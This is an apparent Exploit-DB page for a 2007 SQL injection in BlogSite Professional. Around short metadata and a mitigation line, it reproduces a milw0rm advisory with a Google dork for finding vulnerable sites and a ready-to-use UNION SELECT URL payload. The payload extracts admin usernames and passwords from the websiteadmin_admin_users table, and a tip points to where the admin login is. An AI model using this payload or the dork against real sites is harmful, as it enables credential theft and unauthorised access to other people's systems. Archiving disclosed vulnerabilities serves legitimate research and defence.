header-logo
Suggest Exploit
vendor:
BlogSite Professional
by:
t0pP8uZz & xprog
5.5
CVSS
MEDIUM
SQL Injection
89
CWE
Product Name: BlogSite Professional
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

BlogSite Professional SQL Injection Vulnerability

The vulnerability allows an attacker to pull out admin/members login credentials by exploiting a SQL injection vulnerability in the BlogSite Professional application. The exploit uses a crafted URL to perform a UNION SELECT statement and retrieve the username and password from the websiteadmin_admin_users table.

Mitigation:

To mitigate this vulnerability, the vendor should release a patch or update to fix the SQL injection vulnerability.
Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+              BlogSite Professional SQL Injection Vulnerbility                  +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: N/A
DORK: allintext:"Browse Blogs by Category"


DESCRIPTION:
pull out admin/members login credentials


EXPLOITS:
http://www.server.com/index.php?page_id=-1&news_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6/**/FROM/**/websiteadmin_admin_users/*


NOTE/TIP:
admin login is the normal login on index.php


GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net/G0t-Root.org !


--==+================================================================================+==--
--==+              BlogSite Professional SQL Injection Vulnerbility                  +==--
--==+================================================================================+==--

# milw0rm.com [2007-07-20]